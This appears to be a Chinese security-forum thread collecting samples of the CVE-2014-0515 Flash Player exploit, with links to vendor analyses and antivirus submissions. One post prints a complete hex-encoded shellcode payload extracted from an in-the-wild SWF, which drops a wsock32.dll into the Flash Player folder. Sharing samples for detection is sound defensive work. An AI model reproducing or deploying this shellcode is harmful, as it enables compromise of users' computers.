CVE-2014-0515 (7L 更新)

显示全部楼层 · 发表于 2014-5-2 22:06:59

本帖最后由 hx1997 于 2014-5-3 13:03 编辑

http://www.securelist.com/en/blo ... tering_hole_attacks
http://www.symantec.com/connect/ ... layer-vulnerability
http://bbs.360safe.com/thread-3969530-1-1.html

https://www.virustotal.com/en/fi ... bcd3203f8/analysis/

PoC

显示全部楼层 · 发表于 2014-5-2 22:39:35

好像不包含 shellcode　这个样本

显示全部楼层 · 发表于 2014-5-2 22:47:49

已经采集。

显示全部楼层 · 发表于 2014-5-2 23:54:07

To Dr.Web

[drweb.com #4706936]

显示全部楼层 · 发表于 2014-5-3 00:03:35

newcenturysun 发表于 2014-5-2 22:39
好像不包含 shellcode　这个样本

只是 PoC 还没有 itw 样本

显示全部楼层 · 发表于 2014-5-3 10:25:02

本帖最后由尘梦幽然于 2014-5-4 13:24 编辑

赛门铁克的文章里说已经建立了新病毒定义BloodHound.Flash.24。
主要还是靠ips

显示全部楼层 · 发表于 2014-5-3 13:03:06

本帖最后由 hx1997 于 2014-5-3 13:41 编辑

https://www.virustotal.com/en/fi ... dc0a5aa3c/analysis/

include.swf

flash10p.ocx
CCDDciscompeaddin5x0
..\..\..\roaming\macromedia\flash player\www.macromedia.com\bin\ciscompeaddin5x0\wsock32.dll

fce88201000033c0c3608bec33d2648b52308b520c8b52148b72280fb74a2633ff33c0ac3c617c022c20c1cf0d03f8e2f052578b52108b423c03c28b407885c0744803c2508b48188b582003dae33a498b348b03f233ff33c0acc1cf0d03f838e075f4037df83b7d2475e2588b582403da668b0c4b8b581c03da8b048b03c28b6c241083c428c20400585f5a8b12eb888b542404428bfd47391775fb8bd783c204c204000fb6066689074647473c0075f3c3558bec575383ec1068ec8ac29ce845ffffff8945f433db895df0895dec895de86681cbff0f436a0853ff55f485c075f08b45f083f8007510b814c0c4c08bfbaf7506af7503897df08b45ec83f8007510b8c4c014c08bfbaf7506af7503897dec8b45e883f8007510b8efcdab128bfbaf75b3af75b0897de88b45f083f80074a58b45ec83f800749d8b45e883f8007495518b4d088b45e88b0089018b45e883c00489410483c1088b45f08b0089018b45f083c00489410483c1088b45ec8b0089018b45ec83c004894104598bc783c4105b5f5dc204005d81ec000800008bfcb90001000033c0f3ab892c246830f349e4e862feffff8d8c2400020000516800020000ffd06874728dc4e849feffff6844454646e8c6feffff8d8c24000200005251ffd08d44242050e8d3feffff8b5424248b4424208b7c242403f88b078944242083c704897c242452684c772607e804feffffffd083f800894424048b7c240447813f5850203675f783c708813f5365727675ec8b7ff4897c243c8b7c240483c704833f0475f8837f240875f2837f481075ec81bf58050000f803000075e08bbf5c0500008d4720b90200000049781e8bd081c2f803000083ea04813affffff0774103bd07ff105f8030000ebdf8b7f08ebd28b400c8944241c8b2c246842434444e8f7fdffff89542410c744240c000000008b44243cff74241cffd0894424088b4c24088b018d54241052837c24100074138b74242489710c8b742428897110ff501ceb118b74242c89710c8b742430897110ff501883f8007502eb02ebb3ff44240c837c240c0174a868daf6da4fe802fdffff8d9424000200006a0068800000006a026a006a03680000004052ffd08944240c682d57ae5be8d8fcffff8b4c24308b7c24348d7424408b54240c6a0056515752ffd068c6968752e8b6fcffffff74240cffd08b7c240447813f8b46208975f783c704813f5e50837875ec83c70466813f480a75e28d4f60498139ff7628e874143bcf75f38d4f60498139565357e874043bcf75f30349048d410833db8b5424108b4c240853518d9c24000100005352ffd083c4106848494d4de8cbfcffff81c400080000ffe245454949666c6173683130702e6f6378000043434444636973636f6d7065616464696e35783000454546462e2e5c2e2e5c2e2e5c726f616d696e675c6d6163726f6d656469615c666c61736820706c617965725c7777772e6d6163726f6d656469612e636f6d5c62696e5c636973636f6d7065616464696e3578305c77736f636b33322e646c6c0049494d4d

显示全部楼层 · 发表于 2014-5-3 13:03:22

newcenturysun 发表于 2014-5-2 22:39
好像不包含 shellcode　这个样本

7L 的呢

显示全部楼层 · 发表于 2014-5-3 13:08:04

7L样本已经采集

显示全部楼层 · 发表于 2014-5-3 13:31:04

hx1997 发表于 2014-5-3 13:03
7L 的呢

不好意思之前看错了其实一楼的样本也是有shellcode 的 7L的这个样本也有
另外1776的样本应该还有个html 有办法搞到么

[病毒样本] CVE-2014-0515 (7L 更新)

本帖子中包含更多资源

本帖子中包含更多资源